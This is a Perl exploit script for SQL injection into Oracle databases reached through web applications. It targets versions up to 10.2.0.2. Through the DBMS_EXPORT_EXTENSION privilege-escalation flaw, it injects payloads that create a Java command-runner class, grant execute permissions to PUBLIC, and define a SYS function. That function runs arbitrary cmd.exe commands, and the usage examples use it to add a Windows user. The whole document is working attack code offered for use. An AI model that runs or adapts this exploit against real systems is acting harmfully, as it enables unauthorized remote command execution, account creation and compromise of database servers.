#!/usr/bin/env perl use LWP::Simple; print " -----------------------------------------------------------------------\n"; print "Oracle command execution via web apps\n"; print "sid-at-NotSoSecure // www.notsosecure.com \n"; print "suported versions <=10.2.0.2, all platforms\n"; print "------------------------------------------------------------------------\n"; if (@ARGV < 2) { print "Usage:\n"; print "ora_cmd_exec.pl \n"; print "\n"; print "EXAMPLE: ./ora_cmd_exec.pl \"http://192.168.172.129:81/ora3.php?name=s\' \" \"net user notsosecure n0tsos3cur3 /add\"\n"; print "EXAMPLE: ./ora_cmd_exec.pl \"http://192.168.172.129:81/ora3.php?id=100 \" \"net user notsosecure n0tsos3cur3 /add\"\n"; print "------------------------------------------------------------------------\n"; exit(); } my $url_1 = $ARGV[0]."and 1="; my $javalib="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named \"LinxUtil\" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str %2b=stemp%2b\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str %2b=stemp%2b\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual)--"; my $javaperm="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual)--"; my $cmd_exec_func="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual)--"; my $cmd_exec_func_priv="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual)--"; my $cmd_1=$ARGV[1]; my $cmd_exec="(select sys.LinxRunCMD('cmd.exe /c". $cmd_1. "') from dual)--"; print "Step 1. Creating Java Library...\n"; print "--------------------------------\n"; my $url=$url_1.$javalib; my $content = get $url; die "Couldn't get $url" unless defined $content; if($content =~ m/warning/i) { print "-----------------------------------------------\n"; print "ERROR at STAGE 1 occured !!!...did you provide me the URL in the format, i want?? \n"; print "-----------------------------------------------\n"; } else { print "NO errors encountered.....proceeding to step..2\n"; print "--------------------------------\n"; # print $content; } #----------------------- print "Step 2. granting java execute privileges...\n"; my $url=$url_1.$javaperm; my $content = get $url; die "Couldn't get $url" unless defined $content; if($content =~ m/warning/i) { print "-----------------------------------------------\n"; print "ERROR at STAGE 2 occured !!!...something was not right.. \n"; print "-----------------------------------------------\n"; print "I will proceed, however, there is a possibility that the attack will fail\n"; } else { print "NO errors encountered.....proceeding to step..3\n"; print "--------------------------------\n"; # print $content; } #----------------------- print "Step 3. creating funtion for command execution...\n"; my $url=$url_1.$cmd_exec_func; my $content = get $url; die "Couldn't get $url" unless defined $content; if($content =~ m/warning/i) { print "-----------------------------------------------\n"; print "ERROR at STAGE 3 occured !!!...something was not right.. \n"; print "-----------------------------------------------\n"; print "I will proceed, however, there is a possibility that the attack will fail\n"; } else { print "NO errors encountered.....proceeding to step..4\n"; print "--------------------------------\n"; # print $content; } #----------------------- print "Step 4. making function executable by all users...\n"; my $url=$url_1.$cmd_exec_func_priv; my $content = get $url; die "Couldn't get $url" unless defined $content; if($content =~ m/warning/i) { print "-----------------------------------------------\n"; print "ERROR at STAGE 4 occured !!!...something was not right.. \n"; print "-----------------------------------------------\n"; print "I will proceed, however, there is a possibility that the attack will fail\n"; } else { print "NO errors encountered.....proceeding to step..5\n"; print "--------------------------------\n"; # print $content; } #----------------------- print "Step 5. RIGHT!!!, by now we should have a function sys.LinxRunCMD through which we can execute commands...\n"; print "--------------------------------\n"; print "You should be able to execute this function as:\nselect sys.LinxRunCMD('cmd.exe /c net user notsosecure n0ts3cur3 /add') from dual\n"; print "I will execute the command you told me to execute... you won't be able to see the output though :( \n"; my $url=$url_1.$cmd_exec; my $content = get $url; die "Couldn't get $url" unless defined $content; if($content =~ m/warning/i) { print "-----------------------------------------------\n"; print "ERROR at STAGE 5 occured !!!...something was not right.. \n"; print "-----------------------------------------------\n"; print "...You need to investigate buddy....\n"; } else { print "-----------------------------------------------\n"; print "SUCCESS: Your command executed on the box....:)\n"; print "-----------------------------------------------\n"; # print $content; }